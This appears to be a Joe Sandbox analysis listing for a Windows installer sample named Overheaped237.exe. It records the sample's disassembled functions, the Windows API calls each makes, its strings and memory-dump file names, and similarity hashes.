Function 00405AB1 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,004056C9,?,?,00000000,004058AC,?,?,?,?), ref: 00405AB6
SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405ACA

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
Instruction ID: a7f0a3a241a8181cef173a1dc0fd71ceb180899bf82cabeb0f5c2b47daa9e471
Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
Instruction Fuzzy Hash: 0AD0C972908121AFC2102728AD0C89BBB65EB54271B118B31FDAAA22B0D7304C528AA5

Function 004055BF Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,0040321E,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040341B), ref: 004055C5
GetLastError.KERNEL32 ref: 004055D3

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
Instruction ID: ee333ff4e59061917a1f290c3015eab559b7a368ac9c9957fcbd809aee07952f
Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
Instruction Fuzzy Hash: 04C08C31618102EBDB200B30CE08B073E61AB00381F208831A006F10E4CA349000C93F

Function 00402283 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004022BC

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
Instruction ID: ed5e863b5af70a22674a87f6432e4eb84017b1e79b4e81bbc09640d5f5368664
Opcode Fuzzy Hash: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
Instruction Fuzzy Hash: 8AE04F31B001746FDB217AF14E8EE7F11989B84348B64417EF601B62C3DDBC4D434AA9

Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
Instruction ID: 806e3b40af95552ac91145e5354a2e2caa18036cb762c00ee55acc3717e10e35
Opcode Fuzzy Hash: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
Instruction Fuzzy Hash: D3E04FB6240108AFDB00EFA4DD46FA537ECE714701F008021B608D6091C674E5108B69

Function 00405B4E Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004128D8,0040A8D8,004031E0,00409130,00409130,004030E4,004128D8,00004000,?,00000000,00402F8E), ref: 00405B62

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: ffd4dfc917ffc97e7d907f9c2c90699c203f3b0ebfd4578ed28d6b2a376640fe
Instruction ID: c996f9a7b3ae33303237a126fc5a394e9691c2321a0fe14ef9137570749964f2
Opcode Fuzzy Hash: ffd4dfc917ffc97e7d907f9c2c90699c203f3b0ebfd4578ed28d6b2a376640fe
Instruction Fuzzy Hash: EAE08C3221465EABCF109E509C00EEB3B6CEB00360F008432FD24E2090D230F8209BA4

Function 00405B7D Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,0040C09F,0040A8D8,00403164,0040A8D8,0040C09F,004128D8,00004000,?,00000000,00402F8E,00000004), ref: 00405B91

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction ID: 30ff8eedcc03066b87caa2a29a7ef1e7350fb4aaf77a02d24525aee886acae2a
Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction Fuzzy Hash: 19E0EC3261425AEFEF609E659C00AEB7B7CFB05360F008432F925E6190D635F9219BA5

Function 00404094 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(000103EE,00000000,00000000,00000000), ref: 004040A6

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 50a7dacb6371fe0cd67611078dbaf3ccf85a23f01bbb2752a0812b92d5b89748
Instruction ID: add50700843ac817ab7d6e51381e723622021bba1cfe7f2961aa6f321ae6f442
Opcode Fuzzy Hash: 50a7dacb6371fe0cd67611078dbaf3ccf85a23f01bbb2752a0812b92d5b89748
Instruction Fuzzy Hash: 1CC04C71744201BAEA319B509D49F0777986750700F6644257320B60D1C6B4E410E62D

Function 0040407D Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403EAE), ref: 0040408B

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3d364c0f7cae05b6249e8bcc12743ca4c2e9a63f4273028bf1a1c1708aea3851
Instruction ID: a78b9239c319e9cb66b61a8ea9955aebbc10e43728856a3b978814f56e37e297
Opcode Fuzzy Hash: 3d364c0f7cae05b6249e8bcc12743ca4c2e9a63f4273028bf1a1c1708aea3851
Instruction Fuzzy Hash: 19B092B6684200BAEE228B00DD09F457AB2E7A8742F008024B200240B0CAB200A1DB19

Function 004031E3 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EE1,?), ref: 004031F1

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Function 0040406A Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403E47), ref: 00404074

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 14a97dc87043aa2e894c667cdbf79e2d841fd90f9686f850a1099e45bc3f86c8
Instruction ID: 4b90da896e4fa09681504a9dabf2ba00c57f91177066947fb67d52e8ca440c18
Opcode Fuzzy Hash: 14a97dc87043aa2e894c667cdbf79e2d841fd90f9686f850a1099e45bc3f86c8
Instruction Fuzzy Hash: FCA012324040009BCB014B90FE04C457F31A754300701C031E10180030C2310824FF09

Non-executed Functions

Function 004049F9 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404A11
GetDlgItem.USER32(?,00000408), ref: 00404A1C
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A66
LoadBitmapA.USER32(0000006E), ref: 00404A79
SetWindowLongA.USER32(?,000000FC,00404FF0), ref: 00404A92
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AA6
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AB8
SendMessageA.USER32(?,00001109,00000002), ref: 00404ACE
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404ADA
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AEC
DeleteObject.GDI32(00000000), ref: 00404AEF
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B1A
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B26
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BBB
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BE6
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BFA
GetWindowLongA.USER32(?,000000F0), ref: 00404C29
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C37
ShowWindow.USER32(?,00000005), ref: 00404C48
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D45
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DAA
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DBF
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DE3
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E03
ImageList_Destroy.COMCTL32(00000000), ref: 00404E18
GlobalFree.KERNEL32(00000000), ref: 00404E28
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EA1
SendMessageA.USER32(?,00001102,?,?), ref: 00404F4A
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F59
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F79
ShowWindow.USER32(?,00000000), ref: 00404FC7
GetDlgItem.USER32(?,000003FE), ref: 00404FD2
ShowWindow.USER32(00000000), ref: 00404FD9

Strings

M, xrefs: 00404BA2
N, xrefs: 00404C83
, xrefs: 00404FB1

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: f71c4aa5fa736d427a4380ee5912dc7cb3dc5a811f5ff7b07bbbad78877c99f0
Instruction ID: 3cd80f6d66a0a8d02be1144e931921fec7cdafd03fadcad4e17be0217faf115b
Opcode Fuzzy Hash: f71c4aa5fa736d427a4380ee5912dc7cb3dc5a811f5ff7b07bbbad78877c99f0
Instruction Fuzzy Hash: 9D026EB0900209AFEB10DF94DD85AAE7BB5FB84315F10813AF611B62E1C7789E42DF58

Function 00404486 Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004044D5
SetWindowTextA.USER32(00000000,?), ref: 004044FF
SHBrowseForFolderA.SHELL32(?,0041F108,?), ref: 004045B0
CoTaskMemFree.OLE32(00000000), ref: 004045BB
lstrcmpiA.KERNEL32(Remove folder: ,shovelhead Setup: Completed), ref: 004045ED
lstrcatA.KERNEL32(?,Remove folder: ), ref: 004045F9
SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040460B

Part of subcall function 0040563D: GetDlgItemTextA.USER32(?,?,00000400,00404642), ref: 00405650

Part of subcall function 004060CE: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Overheaped237.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403206,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040341B), ref: 00406126
Part of subcall function 004060CE: CharNextA.USER32(?,?,?,00000000), ref: 00406133
Part of subcall function 004060CE: CharNextA.USER32(?,"C:\Users\user\Desktop\Overheaped237.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403206,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040341B), ref: 00406138
Part of subcall function 004060CE: CharPrevA.USER32(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403206,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040341B), ref: 00406148

GetDiskFreeSpaceA.KERNEL32(0041ED00,?,?,0000040F,?,0041ED00,0041ED00,?,00000001,0041ED00,?,?,000003FB,?), ref: 004046C9
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046E4

Part of subcall function 0040483D: lstrlenA.KERNEL32(shovelhead Setup: Completed,shovelhead Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404758,000000DF,00000000,00000400,?), ref: 004048DB
Part of subcall function 0040483D: wsprintfA.USER32 ref: 004048E3
Part of subcall function 0040483D: SetDlgItemTextA.USER32(?,shovelhead Setup: Completed), ref: 004048F6

Strings

aP, xrefs: 0040448C
error, xrefs: 0040449F
Remove folder: , xrefs: 004045E7, 004045EC, 004045F7
shovelhead Setup: Completed, xrefs: 00404583, 004045E6
A, xrefs: 004045A9
C:\Users\user\AppData\Roaming\china\Mixeren\verbalises, xrefs: 004045D6

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises$Remove folder: $error$shovelhead Setup: Completed$aP
API String ID: 2624150263-1263105840
Opcode ID: 270dc7a5b9dcdb78d87257eb559ab6150f0e039b037db56f317b36bf3157eca3
Instruction ID: 175f10717e4f371f028a94a7e43d857af948bb7b3e906aba32508f1788989df3
Opcode Fuzzy Hash: 270dc7a5b9dcdb78d87257eb559ab6150f0e039b037db56f317b36bf3157eca3
Instruction Fuzzy Hash: 27A18FF1900209ABDB11AFA5CC45AAFB7B8EF85314F14843BF601B72D1D77C9A418B69

Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

